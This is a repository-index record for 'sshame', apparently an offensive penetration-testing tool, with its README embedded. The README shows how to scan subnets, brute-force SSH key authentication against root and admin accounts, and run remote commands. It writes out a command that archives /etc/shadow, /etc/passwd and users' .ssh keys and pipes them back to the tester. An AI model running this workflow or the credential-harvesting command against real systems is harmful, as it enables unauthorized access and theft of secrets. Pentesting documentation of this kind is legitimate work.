{"id":13650875,"url":"https://github.com/HynekPetrak/sshame","last_synced_at":"2025-04-22T18:33:02.168Z","repository":{"id":199292074,"uuid":"204323061","full_name":"HynekPetrak/sshame","owner":"HynekPetrak","description":"brute force SSH public-key authentication","archived":false,"fork":false,"pushed_at":"2024-03-24T11:07:35.000Z","size":120,"stargazers_count":70,"open_issues_count":1,"forks_count":14,"subscribers_count":3,"default_branch":"master","last_synced_at":"2024-03-24T12:22:47.963Z","etag":null,"topics":["authentication","brute-force","brute-force-attacks","ethical-hacking","penetration-testing","remote-admin-tool","ssh","ssh-key"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/HynekPetrak.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2019-08-25T16:50:56.000Z","updated_at":"2024-04-14T19:42:59.826Z","dependencies_parsed_at":null,"dependency_job_id":"929df2db-0a2b-49fc-b43d-79008b5cb99f","html_url":"https://github.com/HynekPetrak/sshame","commit_stats":null,"previous_names":["hynekpetrak/sshame"],"tags_count":6,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HynekPetrak%2Fsshame","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HynekPetrak%2Fsshame/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HynekPetrak%2Fsshame/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HynekPetrak%2Fsshame/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/HynekPetrak","download_url":"https://codeload.github.com/HynekPetrak/sshame/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":223903237,"owners_count":17222500,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["authentication","brute-force","brute-force-attacks","ethical-hacking","penetration-testing","remote-admin-tool","ssh","ssh-key"],"created_at":"2024-08-02T02:00:41.931Z","updated_at":"2024-11-10T01:31:19.368Z","avatar_url":"https://github.com/HynekPetrak.png","language":"Python","funding_links":[],"categories":["Tools"],"sub_categories":[],"readme":"![sshame logo](sshame.png)\n# sshame - brute force SSH public-key authentication\nInteractive tool to brute force ssh public key authentication. Primarily intended for pentration testers. Sshame can execute commands on remote hosts.\n\n## Installing ##\n\n### Installing from Github ###\n\nClone the source from Github:\n\n    git clone https://github.com/HynekPetrak/sshame.git\n    cd sshame\n\nThen in order to install run:\n\n    python -m pip install .\n\nIn case you want to contribute instead of install run:\n\n    python -m pip install --editable .\n\n### Installaling via PyPI ###\n\n`pip3` will install the latest release.\n\n    pip3 install sshame\n\n## Basic usage ##\n\nsshame is interactive, based on https://github.com/python-cmd2/cmd2\n\n    # sshame\n    (sshame)\n\nType help to get a list of commands:\n\n    (sshame) help\n\n    Documented commands (type help \u003ctopic\u003e):\n\n    Sshame\n    ======\n    commands  creds  exploit  hosts  keys  resolve  session\n\n    Uncategorized\n    =============\n    alias  help     macro     py    record        run_script  shell\n    edit   history  playback  quit  run_pyscript  set         shortcuts\n\n\n### Add target hosts ###\n\nIn the sshame shell run `hosts -a list-of-ip-ranges-or-hosts [-p port]`:\n\n    (sshame) hosts -a 10.0.0.0/24 -p 22\n    Scanning 10.0.0.0/24 on port(s) 22\n    ........***.............\n    Received 877 packets, got 222 answers, remaining 34 packets\n    2019-08-25 19:22:15,633 sshame [I] 'Adding host (port open): 10.0.0.2 22'\n    2019-08-25 19:22:15,683 sshame [I] 'Adding host (port open): 10.0.0.1 22'\n    2019-08-25 19:22:15,686 sshame [I] 'Adding host (port open): 10.0.0.6 22'\n\n sshame will scan the given hosts with scapy and add those, which have the port open.\n\n To verify added hosts with TCP port open run `hosts -l`\n\n### Load ssh keys ###\n\n Load private keys with `keys -a glob_path [-p list-of-passwords]`\n\n    (sshame) keys -a test/**/*key\n    2019-08-25 19:30:40,613 sshame [I] \"Adding ssh keys from: ['test/**/*key']\"\n    2019-08-25 19:30:40,614 sshame [I] \"Discovered 4 files in 'test/**/*key'.\"\n    2019-08-25 19:30:40,615 sshame [I] 'Going to examine 4 files.'\n    2019-08-25 19:30:40,635 sshame [I] 'Importing ssh-dss key: test/keys/dsa_key'\n    2019-08-25 19:30:40,645 sshame [I] 'Importing ssh-rsa key: test/keys/rsa_key'\n    2019-08-25 19:30:40,680 sshame [I] 'Importing ecdsa-sha2-nistp256 key: test/keys/ecdsa_key'\n    2019-08-25 19:30:40,693 sshame [I] 'Importing ssh-ed25519 key: test/keys/ed25519_key'\n    Loaded 4 unique keys, ignoring 0 duplicates\n\n`-p list-of-passwords` is optional in case you load encrypted private keys protected with passwords.\n\nList loaded keys with `keys -l`\n\n### Test keys on hosts ###\n\nTo brute force which keys authenticates on which target run `test_keys -u list-of-users`:\n\n    (sshame) test_keys -u root admin\n    2019-08-25 19:34:31,900 sshame [I] 'Preparing target jobs...'\n    2019-08-25 19:34:31,933 sshame [I] 'Matching keys - 16 jobs scheduled'\n    Completed: [####################] [100.00%]\n    2019-08-25 19:34:56,857 sshame [I] '---------------------------------------------------------------------------'\n\nList matching keys with `creds -l`:\n\n    (sshame) creds -l\n    [1/1/1]: ssh -i test/keys/rsa_key root@10.0.0.2\n    [2/2/1]: ssh -i test/keys/dsa_key admin@10.0.0.1\n\n### Run commands on remote hosts ###\n\nTo run commands on remote hosts use `run_cmd -c command`, e.g.:\n\n    (sshame) run_cmd -c whoami\n    2019-08-25 23:28:22,757 sshame [I] 'Preparing target jobs...'\n    2019-08-25 23:28:22,763 sshame [I] 'Executing commands - 2 jobs scheduled'\n    Completed: [####################] [100.00%]\n    2019-08-25 23:28:23,993 sshame [I] '---------------------------------------------------------------------------'\n\n### Show command results ###\n\nWith `commands -r` diplay the results:\n\n    (sshame) commands -r\n    Entries: 2\n\n    | guid                                 | host_address   |   host_port | username   | cmd                  |   exit_status | output          | updated             |\n    |--------------------------------------+----------------+-------------+------------+----------------------+---------------+-----------------+---------------------|\n    | 434f163a-24b5-4775-a3c1-6ea41745b18d | 10.0.0.2       |          22 | root       | whoami               |             0 | root            | 2019-08-25 21:28:23 |\n    | 305e3f5d-bf4d-4024-981a-59b2dddebbcd | 10.0.0.1       |          22 | admin      | whoami               |             0 | admin           | 2019-08-25 21:28:23 |\n\n### Pipe remote commands to a local shell ###\n\nDefine an alias `get_files` for a remote command `tar -cf -  /etc/passwd /etc/ldap.conf /etc/shadow /home/*/.ssh /etc/fstab | gzip | uuencode /dev/stdout; exit 0`\n and pipe it to a local `uudecode -o - |tar xzf -`, with:\n\n    commands -a get_files \"tar -cf -  /etc/passwd /etc/ldap.conf /etc/shadow /home/*/.ssh /etc/fstab | gzip | uuencode /dev/stdout; exit 0\" -p \"uudecode -o - |tar xzf -\"\n\n`exit 0` is to override tar's exit code in case of missing files.\n\nRun te defined command with:\n\n    run_cmd -c get_files\n\nThe output you will find in the folder `output/\u003chost\u003e_\u003cport\u003e/username/...`\n\n\n### Session management ###\n\nYou may want to split wokloads into sessions. Use `session name` to switch between sessions. Default session is \ncalled 'default'.\n\nEach session has its data stored in a separate sqlite db in the current directory named after the session \nname, e.g. `default.db`\n\n    (sshame) session test\n    2019-08-25 23:38:38,283 sshame [I] 'Openning session: sqlite:///test.db'\n\n### License ###\n\nMIT\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FHynekPetrak%2Fsshame","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FHynekPetrak%2Fsshame","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FHynekPetrak%2Fsshame/lists"}